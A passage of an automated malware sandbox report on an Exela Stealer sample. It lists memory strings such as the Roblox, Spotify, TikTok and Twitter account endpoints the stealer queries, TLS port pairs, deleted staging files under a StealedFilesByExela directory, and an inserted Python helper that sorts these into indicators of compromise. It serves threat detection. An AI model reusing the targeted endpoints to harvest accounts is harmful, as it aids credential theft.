            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B48260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer----------------------
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2417097978.0000018B495CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m~
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/home
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.jsonP
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444818506.0000018B47DC0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86731000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122726494.000002BD86731000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
            Source: METADATA.0.drString found in binary or memory: https://www.attrs.org/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/latest/names.html)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
            Source: METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447278741.0000018B49DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.b
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B48260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444818506.0000018B47DC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457245244.00007FFDA3472000.00000004.00000001.01000000.00000011.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2144659393.0000018B479A0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437909240.0000018B479B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B4798E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434391488.0000018B4799C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434277600.0000018B4799B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444100879.0000018B479B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121997815.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434510034.0000018B47C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.variomedia.de/
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

            Spam, unwanted Advertisements and Ransom Demands

            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\NEBFQQYWPS.xlsx
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PWCCAWLGRE.jpg
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ZQIXMVQGAH.xlsx
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PIVFAGEAAV.png
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\EFOYFBOLXA.png
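The five deletions above all hit paths under C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\, that is, the stealer's own staging copies, not the originals on the user's Desktop. That reads as post-collection cleanup rather than ransomware-style destruction; the section heading comes from the report's generic "modifies existing user documents" heuristic, so check the full behaviour log before treating it as more than that. Likewise, the string list above mixes noise from the bundled Python runtime and its TLS and signing chain (python.org, openssl.org, digicert.com, attrs.org) with the account endpoints the stealer queries (roblox.com/my/account/json, the Spotify account-settings profile, the TikTok passport account-info call, reddit.com/user/). The Python below is an added triage helper, not part of the Joe Sandbox report and not Exela code: it parses report lines of the three kinds shown in this section into a small IOC set, separating account endpoints from runtime noise by URL path, collapsing the 443 <-> ephemeral port pairs into client ports, and summarising the staging directory and file types. The sample lines are copied from this section (one network line is left in the concatenated form the raw page extraction produces); TOOLCHAIN_HOSTS and the account-path keywords are heuristics assumed here, not something the report states.

```python
import ntpath
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: lines copied from this report's signature dump. The last
# network line keeps the concatenated "unknownNetwork ..." form that raw text
# extraction produces, to show that parsing keys on field labels, not layout.
SAMPLE_LINES = [
    "Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.roblox.com/my/account/json",
    "Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile",
    "Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434510034.0000018B47C3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba",
    "Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/user/",
    "Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.twitch.tv/0",
    "Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2144659393.0000018B479A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.python.org/",
    "Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457245244.00007FFDA3472000.00000004.00000001.01000000.00000011.sdmp | String found in binary or memory: https://www.openssl.org/H",
    "Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0",
    "Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766",
    "Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443",
    "Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\NEBFQQYWPS.xlsxJump to behavior",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PWCCAWLGRE.jpg",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PIVFAGEAAV.png",
]

URL_RE = re.compile(r"String found in binary or memory:\s*(\S+)")
PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
# "Jump to behavior" is link text that the page extraction glues onto the path.
DELETED_RE = re.compile(r"File deleted:\s*(.+?)(?:Jump to behavior)?\s*$")

# Assumption (not stated by the report): hosts that show up because of the bundled
# Python runtime, its TLS library and the code-signing chain, not as stealer targets.
TOOLCHAIN_HOSTS = {"www.python.org", "www.openssl.org", "www.digicert.com", "www.attrs.org"}
# Assumption: path words that mark a "who am I / what is my account" endpoint.
ACCOUNT_PATH_RE = re.compile(r"/(account|profile|passport|user)\b", re.IGNORECASE)


def classify_url(url: str) -> str:
    """Bucket a memory string as toolchain noise, an account endpoint, or other."""
    parts = urlsplit(url)
    if parts.hostname in TOOLCHAIN_HOSTS:
        return "toolchain"
    if ACCOUNT_PATH_RE.search(parts.path):
        return "account-endpoint"
    return "other"


def tls_client_ports(lines) -> list:
    """Collapse both directions of each 443 <-> ephemeral pair into the client port."""
    ports = set()
    for line in lines:
        m = PORT_RE.search(line)
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            if 443 in (a, b):
                ports.add(b if a == 443 else a)
    return sorted(ports)


def staging_summary(lines) -> dict:
    """Directory and file types of the deleted staging copies (Windows path rules)."""
    deleted = []
    for line in lines:
        m = DELETED_RE.search(line)
        if m:
            deleted.append(m.group(1))
    return {
        "count": len(deleted),
        "dirs": sorted({ntpath.dirname(p) for p in deleted}),
        "extensions": sorted({ntpath.splitext(p)[1].lower() for p in deleted}),
    }


def build_iocs(lines) -> dict:
    """Turn report lines into the handful of things a hunter would pivot on."""
    urls = defaultdict(set)
    for line in lines:
        m = URL_RE.search(line)
        if m:
            urls[classify_url(m.group(1))].add(m.group(1))
    return {
        "account_endpoints": sorted(urls["account-endpoint"]),
        "toolchain_noise": sorted(urls["toolchain"]),
        "other_urls": sorted(urls["other"]),
        "tls_client_ports": tls_client_ports(lines),
        "staging": staging_summary(lines),
    }


if __name__ == "__main__":
    from pprint import pprint
    pprint(build_iocs(SAMPLE_LINES))
```

The staging directory is the most durable host IOC here: the file names are random per run, but the Temp\StealedFilesByExela\ parent is fixed, so the "dirs" value is what to feed into an EDR file-event hunt. The URL split matters because the toolchain hosts will appear in every Python-packed binary, malicious or not, and blocking or alerting on them produces nothing but noise.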
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B85C00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B689E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B86964
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B61000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B808C8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B83C10
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B72C10
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B71B50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B6ACAD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B6A474
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B86418
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B739A4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B72164
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B71944
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B6A2DB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B7DA5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B69800
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B71F60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | Code function: 0_2_00007FF7B2B78794
